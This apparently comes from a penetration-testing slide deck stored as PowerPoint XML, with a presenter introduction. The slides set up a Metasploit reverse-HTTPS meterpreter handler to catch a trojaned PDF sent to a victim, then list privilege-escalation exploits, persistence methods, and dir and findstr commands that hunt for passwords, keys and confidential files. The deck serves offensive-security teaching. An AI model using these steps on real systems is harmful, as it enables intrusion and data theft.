              </a:rPr>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file to your client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_https</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ExitOnSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set LHOST [your attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; set LPORT 443</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> &gt; exploit –j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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Step 4: Send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trojaned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file to victim and wait for the reverse connection from the client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514600"/>
            <a:ext cx="441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229600" cy="99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Phase 2: Initial Entry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524000"/>
            <a:ext cx="6629400" cy="515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25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229600" cy="99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Phase 2: Initial Entry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382000" cy="510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en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"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Phishing Examples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057400"/>
            <a:ext cx="6888649" cy="313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433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229600" cy="99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Phase 2: Initial Entry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33600" y="1266876"/>
            <a:ext cx="4876800" cy="5591124"/>
          </a:xfrm>
          <a:noFill/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8540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2296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Phase 3: Post-Exploitation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83820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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Privilege escalation and data mining the compromised machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="20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/>
              <a:t>Simple privilege escalation attempts (ex: at command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>uac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> bypass)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/>
              <a:t>Simple data pilfering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>dir c:\*password* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>dir c:\*pass* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>dir c:\*.pcf /s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/>
              <a:t>Simple persistence (ex: registry modification, simple service creation/replacement)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/>
              <a:t>Advanced persistence (custom backdoor)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2296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Phase 3: Post-Exploitation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1295400"/>
            <a:ext cx="8534400" cy="518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en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Example Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>at command </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>KiTrap0d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Win7Elevate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>UACbypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Searching for files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*password* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*competitor* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*finance* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*risk* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*assessment* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*.key* /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*.vsd /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*.pcf /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*.ica /s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	dir c:\*.log /s </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Search in files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> /I /N /S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/C:password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> /I /N /S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>C:secret </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> /I /N /S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/C:confidential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>findstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> /I /N /S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>C:account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr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276600"/>
            <a:ext cx="3352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81400" y="16002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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenDLP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type solution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>-Deploy Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>-Search for Stuff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>-Steal it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eader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ooter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639445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808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strategic Security, Inc. ©                http://www.strategicsec.com/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill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43000" y="1295400"/>
            <a:ext cx="7026275" cy="1895475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How I Throw Down....... (CG)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8600" y="2514600"/>
            <a:ext cx="8458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 smtClean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r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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2133600"/>
            <a:ext cx="86868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557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I don’t curse and drink as much as j0e, but I do hack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I work at Lares </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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57213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="557213" indent="-55721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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="557213" algn="l"/>
                <a:tab pos="1014413" algn="l"/>
                <a:tab pos="1471613" algn="l"/>
                <a:tab pos="1928813" algn="l"/>
                <a:tab pos="2386013" algn="l"/>
                <a:tab pos="2843213" algn="l"/>
                <a:tab pos="3300413" algn="l"/>
                <a:tab pos="3757613" algn="l"/>
                <a:tab pos="4214813" algn="l"/>
                <a:tab pos="4672013" algn="l"/>
                <a:tab pos="5129213" algn="l"/>
                <a:tab pos="5586413" algn="l"/>
                <a:tab pos="6043613" algn="l"/>
                <a:tab pos="6500813" algn="l"/>
                <a:tab pos="6958013" algn="l"/>
                <a:tab pos="7415213" algn="l"/>
                <a:tab pos="7872413" algn="l"/>
                <a:tab pos="8329613" algn="l"/>
                <a:tab pos="8786813" algn="l"/>
                <a:tab pos="9244013" algn="l"/>
                <a:tab pos="9701213" algn="l"/>
              </a:tabLst>
            </a:pPr>
